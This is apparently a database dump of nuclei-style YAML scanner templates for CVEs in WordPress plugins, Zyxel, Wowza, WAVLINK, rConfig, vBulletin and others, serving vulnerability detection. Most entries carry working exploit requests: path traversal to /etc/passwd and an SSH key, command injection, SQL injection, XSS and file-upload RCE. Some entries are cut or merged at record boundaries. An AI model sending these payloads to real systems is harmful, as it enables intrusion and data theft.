This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/fb036dc2-0ee8-4a3e-afac-f52050b3f8c7\n - https://wordpress.org/plugins/ninja-forms/\n - https://www.exploit-db.com/exploits/45880\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19287\n - https://plugins.trac.wordpress.org/changeset/1974335/ninja-forms/trunk/includes/Admin/Menus/Submissions.php\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19287\n cwe-id: CWE-79\n epss-score: 0.37007\n epss-percentile: 0.96816\n cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ninjaforma\n product: ninja_forms\n framework: wordpress\n tags: cve,cve2018,wp-plugin,wp,xss,authenticated,wpscan,edb,ninja-forms,wordpress,ninjaforma\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\">'\n\n - type: word\n part: header_2\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022017ffefd669f716542939f3fbf7cb21c395e7c7444f9c185954a4b4d3f5db6f09022100960d179e7780f639d861a3b9a8d4a7186dc971253532f6ecf8aaaee57396e1d7:922c64590222798bb761d5b6d8e72950", "hash": "4980b87aedf196aeb4ad112d8ca1967d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308077" }, 
"name": "CVE-2018-19326.yaml", "content": "id: CVE-2018-19326\n\ninfo:\n name: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing \"dot dot\" sequences (/../), conduct directory traversal attacks, and view arbitrary files.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system.\n remediation: |\n Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45904\n - https://www.cybersecurity-help.cz/vdb/SB2018120309\n - https://www.zyxel.com/homepage.shtml\n - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19326\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-19326\n cwe-id: CWE-22\n epss-score: 0.01158\n epss-percentile: 0.83304\n cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zyxel\n product: vmg1312-b10d_firmware\n shodan-query: http.html:\"VMG1312-B10D\"\n tags: cve2018,cve,lfi,modem,router,edb,zyxel\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950", "hash": "860ce95edea26acb1552bfa104ab008d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308078" }, 
"name": "CVE-2018-19365.yaml", "content": "id: CVE-2018-19365\n\ninfo:\n name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal\n author: 0x_Akoko\n severity: critical\n description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information.\n remediation: |\n Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability.\n reference:\n - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19365\n - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2018-19365\n cwe-id: CWE-22\n epss-score: 0.01354\n epss-percentile: 0.8589\n cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wowza\n product: streaming_engine\n tags: cve2018,cve,wowza,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950", "hash": "3a22920dcde785620fcb43e018d3c199", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf308079" }, "name": "CVE-2018-19386.yaml", "content": "id: CVE-2018-19386\n\ninfo:\n name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer.\n reference:\n - https://i.imgur.com/Y7t2AD6.png\n - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5\n - https://nvd.nist.gov/vuln/detail/CVE-2018-19386\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-19386\n cwe-id: CWE-79\n epss-score: 0.00177\n epss-percentile: 0.53963\n cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: solarwinds\n product: database_performance_analyzer\n tags: cve,cve2018,solarwinds,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '\n ]>\n \n John\n &ent;\n \n\n headers:\n Content-Type: \"text/xml\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022016df2511df9587d2e1a21d59a71e3598c4f666acb51d03d55d3877ee6e3976040220787814d8c0cecd08ab442e0a8d29b441bac92c91492a482328322906b431ac95:922c64590222798bb761d5b6d8e72950", "hash": "4e0861e3c723e1e0b8203ec8ab10a405", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308174" }, "name": "CVE-2020-12054.yaml", "content": "id: CVE-2020-12054\n\ninfo:\n name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of WordPress Catch Breadcrumb plugin (1.5.4 or higher) to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4\n - https://wpvulndb.com/vulnerabilities/10184\n - https://cxsecurity.com/issue/WLB-2020040144\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12054\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-12054\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.47553\n cpe: cpe:2.3:a:catchplugins:catch_breadcrumb:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: catchplugins\n product: catch_breadcrumb\n framework: wordpress\n 
tags: cve,cve2020,wordpress,xss,wp-plugin,wpscan,catchplugins\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"catch-breadcrumb\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100db708e082a8ba3d59091821632d7f2241b495b3932aebc1de6d324cc76bdbcd9022100984ecb6f768fc8d248166e2f3916daa1a37999edc2146bbb3ba81da8931397cb:922c64590222798bb761d5b6d8e72950", "hash": "9d5800cadc14e2882569fde3fb2661a1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308175" }, "name": "CVE-2020-12116.yaml", "content": "id: CVE-2020-12116\n\ninfo:\n name: Zoho ManageEngine OpManger - Arbitrary File Read\n author: dwisiswant0\n severity: high\n description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability.\n reference:\n - https://github.com/BeetleChunks/CVE-2020-12116\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12116\n - https://www.manageengine.com/network-monitoring/help/read-me-complete.html\n - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12116\n cwe-id: CWE-22\n epss-score: 0.97317\n epss-percentile: 0.99861\n cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: zohocorp\n product: 
manageengine_opmanager\n tags: cve,cve2020,zoho,lfi,manageengine,zohocorp\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Connection: close\n - |\n GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Cache-Control: max-age=0\n Connection: close\n Referer: http://{{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"BEGIN RSA PRIVATE KEY\")'\n - 'status_code_2 == 200'\n condition: and\n\n extractors:\n - type: regex\n name: endpoint\n regex:\n - \"(?m)/cachestart/.*/jquery/\"\n internal: true\n part: body\n# digest: 490a0046304402200fc5ad9bdb1cc7520cf23bdb7395e0d52813c4184fa6a1b953bf69abf71b04a602207241ce6f30a6867e7c54ad6c3c2b7f7d2baf83ec792ce0c9e0b0a1ae5bd4243e:922c64590222798bb761d5b6d8e72950", "hash": "0f4aa34438616f527248f213d71eac90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308176" }, "name": "CVE-2020-12124.yaml", "content": "id: CVE-2020-12124\n\ninfo:\n name: WAVLINK WN530H4 live_api.cgi - Command Injection\n author: DhiyaneshDK\n severity: critical\n description: |\n A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.\n reference:\n - https://github.com/db44k/CVE-2020-12124\n - https://cerne.xyz/bugs/CVE-2020-12124\n - https://www.wavlink.com/en_us/product/WL-WN530H4.html\n - https://github.com/Scorpion-Security-Labs/CVE-2020-12124\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-12124\n cwe-id: CWE-78\n epss-score: 0.9601\n epss-percentile: 0.99361\n cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wavlink\n product: wn530h4_firmware\n tags: cve,cve2020,rce,wavlink\nvariables:\n str: \"{{rand_base(3)}}\"\n num: \"{{rand_int(1, 
10)}}\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n\n - type: word\n part: body\n words:\n - \"WiFiBand\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022013b21c005e3c657c433da224d005da53b149eeb80dfd4a028acd677b578ee5b6022054d78001a87409fc8d1a6988d3013a2efcf687ac9dd00c898b55d79cecbe548e:922c64590222798bb761d5b6d8e72950", "hash": "0f9b7c75566c81833dd5f984fddc69c9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308177" }, "name": "CVE-2020-12127.yaml", "content": "id: CVE-2020-12127\n\ninfo:\n name: WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. 
This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://cerne.xyz/bugs/CVE-2020-12127\n - https://www.wavlink.com/en_us/product/WL-WN530H4.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12127\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12127\n cwe-id: CWE-306\n epss-score: 0.06293\n epss-percentile: 0.93458\n cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn530h4_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2020,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Login='\n - 'Password='\n - 'Model='\n - 'AuthMode='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dffbff0cc3444989ae4c3286f2188aabc64aed833325784119cb5011f1a954ba022100a340bd327ffe1705d7ab2e5a234fb95df02461a432dbbafbcf937d1d7da6f52a:922c64590222798bb761d5b6d8e72950", "hash": "67c1b446cfe2bde0bacddba3aa6aa081", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308178" }, "name": "CVE-2020-12256.yaml", "content": "id: CVE-2020-12256\n\ninfo:\n name: rConfig 3.9.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The rConfig 3.9.4 is vulnerable to cross-site scripting. 
The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.\n reference:\n - https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12256\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-12256\n cwe-id: CWE-79\n epss-score: 0.17512\n epss-percentile: 0.95674\n cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve,cve2020,rconfig,authenticated,xss\n\nhttp:\n - raw:\n - |\n GET /login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n - |\n GET /devicemgmt.php?deviceId=\"> HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\") && contains(body_3, \"rConfig - Configuration Management\")'\n - 'contains(content_type_3, \"text/html\")'\n condition: and\n# digest: 490a0046304402203df7f7a1fafc6740fbc98163bb2959e9bd581ba8ddfd68573ca0af9a64f081ab02202b23a11ef0e6910123ef3657ed3d2374c3748e4f25a59b1d9d7f2e20b40dd381:922c64590222798bb761d5b6d8e72950", "hash": "751937fc00ff8ddd393373e8e983f5c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308179" }, "name": "CVE-2020-12259.yaml", "content": "id: CVE-2020-12259\n\ninfo:\n name: rConfig 3.9.4 - Cross-Site Scripting\n author: r3Y3r53\n 
severity: medium\n description: |\n rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php\n reference:\n - https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12259\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-12259\n cwe-id: CWE-79\n epss-score: 0.16256\n epss-percentile: 0.95859\n cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rconfig\n product: rconfig\n shodan-query: http.title:\"rConfig\"\n tags: cve2020,cve,rconfig,authenticated,xss\n\nhttp:\n - raw:\n - |\n GET /login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /lib/crud/userprocess.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&pass={{password}}&sublogin=1\n - |\n GET /configDevice.php?rid=\"> HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\") && contains(body_3, \"rConfig - Configuration Management\")'\n - 'contains(content_type_3, \"text/html\")'\n condition: and\n# digest: 4a0a004730450221008538b08ecf8b93aacaac1be17c9980fbd0271e09e3a6e8cc79cfa36012a6d45d02203407d4ecb1e8ce517abd06804bf82b38a837a545c09169a361bbf6dc879e332a:922c64590222798bb761d5b6d8e72950", "hash": "4d95d19635fada55f6a0b6cbcc573ceb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817a" }, "name": "CVE-2020-12447.yaml", "content": "id: CVE-2020-12447\n\ninfo:\n name: Onkyo TX-NR585 Web Interface - Directory Traversal\n author: 
0x_Akoko\n severity: high\n description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.\n impact: |\n An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability.\n reference:\n - https://blog.spookysec.net/onkyo-lfi\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12447\n - https://blog.spookysec.net/onkyo-lfi/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12447\n cwe-id: CWE-22\n epss-score: 0.01711\n epss-percentile: 0.8752\n cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: onkyo\n product: tx-nr585_firmware\n tags: cve,cve2020,onkyo,lfi,traversal\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100927c1a44689d7680e0dee3d0c8c5daf8e08fd834eb2fbb5cfea86f3a531c00b9022100c9621cde469f6eace4647eeeb2c70aeea221843a6410e3c169dd9a1f9d162936:922c64590222798bb761d5b6d8e72950", "hash": "b689c1b433bf068296deed853e088096", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817b" }, "name": "CVE-2020-12478.yaml", "content": "id: CVE-2020-12478\n\ninfo:\n name: TeamPass 2.1.27.36 - Improper Authentication\n author: arafatansari\n severity: high\n description: |\n TeamPass 2.1.27.36 is susceptible to improper authentication. 
An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to sensitive information.\n remediation: |\n Upgrade to a patched version of TeamPass or apply the recommended security patches.\n reference:\n - https://github.com/nilsteampassnet/TeamPass/issues/2764\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12478\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-12478\n cwe-id: CWE-306\n epss-score: 0.01186\n epss-percentile: 0.8478\n cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: teampass\n product: teampass\n shodan-query: http.html:\"teampass\"\n tags: cve2020,cve,teampass,exposure,unauth\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/files/ldap.debug.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Get all LDAP params'\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d6f70c837b7c35ddacae603e0c1e3daa72b7f9d47c89a8c75302c0c8ed6e58d9022013c29b988bbbd1e577d673ae7d7e7f5afcb4c3660336ac45125a6db251230793:922c64590222798bb761d5b6d8e72950", "hash": "49d7e86219b7b2aa27b8c1860a42c09f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817c" }, "name": "CVE-2020-12720.yaml", "content": "id: CVE-2020-12720\n\ninfo:\n name: vBulletin SQL Injection\n author: pdteam\n severity: critical\n description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL 
injection attacks.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying system.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin.\n reference:\n - https://github.com/rekter0/exploits/tree/master/CVE-2020-12720\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12720\n - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1\n - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html\n - http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-12720\n cwe-id: CWE-306\n epss-score: 0.8836\n epss-percentile: 0.98614\n cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vbulletin\n product: vbulletin\n tags: cve2020,cve,vbulletin,sqli,packetstorm\n\nhttp:\n - raw:\n - |\n POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\n Host: {{Hostname}}\n X-Requested-With: XMLHttpRequest\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n\n matchers:\n - type: word\n words:\n - \"vbulletinrce\"\n# digest: 4b0a00483046022100dd5074caccc4bc33e801e2c155340a006861f84c7b9080cd7c472e2e80fe4689022100c7a4fa68dacccc39599985db84023c514f3e71b07dfa295da29f38998e823d17:922c64590222798bb761d5b6d8e72950", "hash": "60e50cab269bfc0dbec7152f500788f4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30817d" }, "name": "CVE-2020-12800.yaml", "content": "id: CVE-2020-12800\n\ninfo:\n name: WordPress Contact 
Form 7 <1.3.3.3 - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site.\n remediation: |\n Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-12800\n - https://github.com/amartinsec/CVE-2020-12800\n - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html\n - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-12800\n cwe-id: CWE-434\n epss-score: 0.97465\n epss-percentile: 0.99957\n cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: codedropz\n product: drag_and_drop_multiple_file_upload_-_contact_form_7\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\n X-Requested-With: XMLHttpRequest\n\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"supported_type\"\n\n txt%\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"size_limit\"\n\n 5242880\n -----------------------------350278735926454076983690555601\n Content-Disposition: form-data; name=\"action\"\n\n dnd_codedropz_upload\n 
